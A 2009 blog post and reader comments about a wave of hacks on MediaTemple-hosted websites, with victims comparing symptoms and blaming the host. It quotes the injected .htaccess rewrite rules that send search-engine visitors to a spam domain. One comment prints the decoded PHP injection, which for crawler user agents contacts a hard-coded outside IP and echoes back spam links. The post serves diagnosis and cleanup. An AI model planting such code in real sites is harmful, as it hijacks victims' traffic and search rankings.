Blog

MediaTemple/WordPress Hack

Posted by Adrian Hanft on Nov 14, 2009 in Blogging, Technology, Wordpress | 22 Comments

I spent last night trying to figure out how my websites got hacked. Luckily no permanent damage was done, but it did take some time to figure out what was going on. I wanted to post my experience in case someone else comes across this same problem. Here is what happened…

By pure coincidence I happened to be looking at my robots.txt file last night. Actually, I didn’t even have a robots.txt file on my site. I was playing with Google’s Webmaster Tools and noticed that Google was giving errors when it read my robots.txt (which didn’t exist). I went to the address where there shouldn’t have been a file at all (http://fontburner.com/robots.txt) and saw a page of text filled with links to porn/spam sites. This sent me off on a wild goose chase to figure out how my site had been exploited.

The first place I looked was at my .htaccess file. My guess was that they were using the .htaccess file to redirect robots.txt to some other file. In my .htaccess file I noticed this code which I was pretty sure wan’t put there by me:

RewriteEngine On


RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]

RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]

The thing that threw me off was that this looks like legitimate code because the first line looks like it might be telling Google not to index the images of your site. Is this the work of a clever hacker adding decoy code before the really nasty stuff?

Deleting this code from my .htaccess file didn’t seem to affect my robots.txt file so I kept looking for a solution.

At this point I opened a ticket with MediaTemple, my web host to see if they had any advice. They responded quickly with a link to a knowledge base article called “Working with a php injected website.” This article confirmed my .htaccess suspicions and also pointed me to a line of code found in php files. Removing the .htaccess code was easy, but how do you find a line of code in the thousands of php files on a WordPress powered site?

MediaTemple also hinted at the possibility of needing to reinstall all WordPress files, something that I really didn’t want to do. I did some searching and came accross a good writeup of the situation on kyle-brady.com called “WordPress, MediaTemple, and an Injection Attack.” If you are a victim of this attack, I encourage you to read this post because it gives instructions about how to fix and identify the problem as well as many comments from other victims.

It turned out that in addition to removing the malicious code from the .htaccess file I also had to remove code from the index.php files in the root of my site. Once that was all cleared out, my robots.txt file issue was corrected. It looks like other people encountered deeper problems that affected the links in blog posts. Those people had to recreate their recent blog posts manually. Yuck.

This whole ordeal has left me feeling violated and unconfident about both WordPress and MediaTemple. If someone can add code to your .htaccess and your index.php files, that is a major hack. I feel lucky that they didn’t do more harm than they did because it seems like if you can hack those files you could easily take a site down or worse.

I am unsure who is actually to blame for this exploit, if anyone is. I heave read that MediaTemple blames WordPress and WordPress blames MediaTemple. There are reports that Drupal sites have also been exploited, so the problem isn’t limited to WordPress only. WordPress has released an update in the last week, but I don’t see any evidence that this issue was addressed in the latest security fix.

MediaTemple has told me that they changed all affected sites passwords for FTP. They also said that they scanned their servers and removed the malicious code. This is a confusing statement because neither of these things appears to have been done in my case. My FTP password still worked, and unless I removed the code before they did, they didn’t remove it from my site.

The good news is that the issue is (hopefully) behind me. If you are hosted on MediaTemple, I would advise you to take a look at your robots.txt (even if you don’t have one) because if I hadn’t noticed it I never would have known my site was infected. You may be a victim of the hack and not even know it.

Robert Dundon

Thanks for this!

I ended up posting something as well. (Shameless plug: http://blog.theoriginalmrbob.com/index.php/2009/11/15/phphtaccess-hacks/ )

Thanks for your help! I thought it was just me!
http://www.hotmail.com Bart

Wow, this is a pretty recent blogpost. My sites at Mediatemple have been hacked in the same way at Nov 14th. On which cluster are you?
http://jeffreybarke.net/ Jeffrey Barke

At least one of my Media Temple sites was hacked as well (gs), though none of the sites on my (dv) appear to have been affected. Are you (gs) or (dv)?

Thanks,
Jeffrey
admin

Bart, I am on Cluster 1 (I think).

Jeffrey, I am on the gridserver.
http://www.scuba-adventures.com Laz

Boy am I glad to have found this info on here! Thanks for posting it.

I have had the same exact problem with my one of gridserver web accounts. They injected this same code on all three web sites (hosted under the same directory) even though only one of them was running WordPress. This account is on Grid Cluster:02 – Storage Segment:05 (you can check this in the SERVER GUIDE section of your Media Temple account).

On a different Media Temple account where I have my personal web site I have not had any problems, although I don’t run WordPress on that site.

Did you guys use the 1-Click Applications option from MediaTemple to install WordPress? It seems that version (v2.5) is outdated and might be the culprit. If not, what version of WordPress are you guys using?
admin

Laz, I did not use the 1-Click applications options. I installed it manually. I was on version 2.85 when my site was exploited.
Tim

My Joomla sites were all hacked in the same way.

Considering that I have now heard that Drupal and WordPress sites were also hacked, the vulnerability must have been with Media Temple.

The support at Media Temple told me it must have been a security vulnerability with Joomla (even tho I’m running the latest version 1.5.14). After reading that they told you the same about WordPress, I’m kind of pissed off that they are not being up front about this.
Patrick

I’ve had this exact problem. Looks like the hack occurred on November 5, 2009. All of my sites hosted with Media Temple GS (grid cluster 2, storage segment 6) were hacked at the same time in the way you describe – .htaccess, index.php and even (for a hand-coded, static site) index.html were hacked to include code to siphon search traffic away to someone else’s site.

All my sites were hit, whether they were running a CMS or not (WP 2.8.5 and one older version), Dokuwiki and hardcoded HTML all got the same treatment.

I initially assumed this was a WordPress problem. Then that my FTP account had been hacked. Now I see others getting hit by exactly the same thing I’m suspicious that this may actually be a Media Temple problem.
Greg Griffith

I had the exact same injection attack happen to me at Media Temple. MT tech support said they had scanned all my files and removed the malicious code, but nothing of the sort was done – spot checks on several domains and subdomains revealed that nothing had been repaired.

Kyle Brady’s post is definitely required reading for anyone who has been a victim of this attack.

At this point, from what I can tell, the common thread through all this is Media Temple. The vast majority of affected domains and subdomains on my MT account were not WP installations, although it’s certainly possible that the attack is being made *through* WP. If this were purely a WP problem, one would expect other web hosts to be victimized as well; so far it’s only Media Temple that’s had the problem.
Brian Herbert

This same thing happened to me. In my case, however, there was a robots.txt file where there was no longer one, although it was empty. I checked my Urchin logs and noticed a new file in a new directory that had received quite a bit of traffic. According to my logs, the attack happened some time on Monday last week (Nov 9, 2009) Media Temple already removed that file but the directory remained.
http://blog.tinyenormous.com inyenormous.com

Yeah, I was hacked as well. I was running the most up to date version of wordpress. I just sent in a support ticket because something seemed fishy. After searching for the link that got 10k hits in the few days it was up I found this site (google cache) http://74.125.95.132/search?q=cache:KSx1UVh52-kJ:www.dp-lab.org/movable/index.php%3Fitemid%3D892+uprzos&cd=44&hl=en&ct=clnk&gl=us&client=firefox-a that surprisingly is almost all media temple sites! There are easily a few hundred, if not thousands of sites there!

I somehow doubt almost a thousand people had their accounts compromised at once WITHOUT it being Media temple’s fault. I am much more tolerant to a hack than a coverup. I hope we learn more soon!
Matt

Hi, my (gs) account got hacked as well, and I can confirm that the hack is not confined to wp sites. I had a couple of wp sites and hand-built sites without any kind of cms/blogging backend on my (gs) account, and both types have been hacked by manipulating .htaccess and index.php. MediaTemple says that the ftp accounts got compromised, which I find a threadbare argument, as at least my ftp pw was 16+ chars long and QUITE hard to being brute-forced open. I hope that whatever back door the crackers used is closed by now.
fwitz

I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but NONE of them had wordpress installed.

The encoded PHP evaluates to this:

if(stripos($_SERVER['HTTP_USER_AGENT'], ‘google’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘yahoo’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘msn’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘live’))
{
$r = ”;
if($f=@fsockopen(’91.207.4.18′,80,$e,$er,10) and @fputs($f, “GET /linkit/in.php?domain=” . urlencode($_SERVER["SERVER_NAME"]) . “&useragent=” . urlencode($_SERVER['HTTP_USER_AGENT']) . ” HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n”))
while( $l = fread($f, 1024)) $r .= $l;
@fclose($f);
$p=strpos($r,”\r\n\r\n”); echo substr($r,$p+4);
}
http://lkdl.com Alex

Have a mediatempleaccount with several websites (several wordpress installations (not up to date) and a site hand coded) all were infected in the last week or so.
http://www.studioal.com Kerri

It’s definitely not limited to WordPress or other CMS sites. One of my clients’ Media Temple sites was attacked. It’s a hand-built site, and the only PHP included are includes and some PHP to parse a static XML file. There aren’t even any forms. If MT is trying to blame WordPress for this, they’re really off base.
http://discoverybuzz.com/ Michael VanDeMar

I am unsure who is actually to blame for this exploit, if anyone is. I heave read that MediaTemple blames WordPress and WordPress blames MediaTemple. There are reports that Drupal sites have also been exploited, so the problem isn’t limited to WordPress only. WordPress has released an update in the last week, but I don’t see any evidence that this issue was addressed in the latest security fix.

This was not the fault of any software running on someone’s account. From what I understand, mt stored everyones passwords in plain text (ie. human readable) in their database, and it was this database itself that got hacked. This allowed hackers direct access via ftp and ssh to all of their clients accounts.

http://michaeltorbert.com/blog/media-temple-hacked/

If you do a search on Twitter right now for mediatemple you can see all the people affected. As of right now, as far as I know, they have not issued any official statement on this, let alone an apology.
http://Mediatemple.net Matt Jones

Hey folks, if you didn’t notice any changes to your sites, that means none of your files were affected. FTP passes were changed as a precautionary measure.

Lots of info can be found here:

http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/

…with updates on the way.

Matt (mt)
http://tatianes.com Tatiane

One of my clients’ MT account got hacked as well. I hope they fixed their holes because I have a bunch of clients hosted with them.
http://www.littlegettysburgmusic.com John

Hi. My Media Temple WordPress site hacked as well.

Here is what I want to know, as this has never happened to me before and I am semi-computer illiterate:

Is my site dead and gone? If not, how do I regain access to it.

I am also locked out of my FTP account. I assume this is related.

Any help would be greatly appreciated.
http://www.matuvu.nu ine

i guess it happened again. while i was safe last time, this time about all my wordpress installs got hacked…
i’m definitely not the only one.
their advise: reinstall.
can’t believe it.
http://www.thinkers.it Antonio

Not alone. I had all my sites hacked as well by a turkish hacker named RD-Z3RO.

I had all my top domains defaced (joomla, wordpress and plain html sites, not only wordpress, so dont bother please with “hard your wordpress installation”).

The hacker did void the .htaccess and pulled in a index.html, a logo.ong and a flag.jpg file.

I searched thru the entire domains and it seems that nothing else has been touched, except for those strange guys in my wordpress users (johnnyA but others as well).

I spent half an hour to change ALL the passwords (root, ftp’s, emails, databases) and reconfigure them all.

I have to be honest: it seems to be a breach in the server, not in the software. But i am waiting for Mediatemple to clarify.
I have to be honest
http://www.alibabavize.com moldova vizezi

iyi

Blog

MediaTemple/WordPress Hack

Pssst. Over here…

Instagram

Recent Posts

Instagrams

Tweets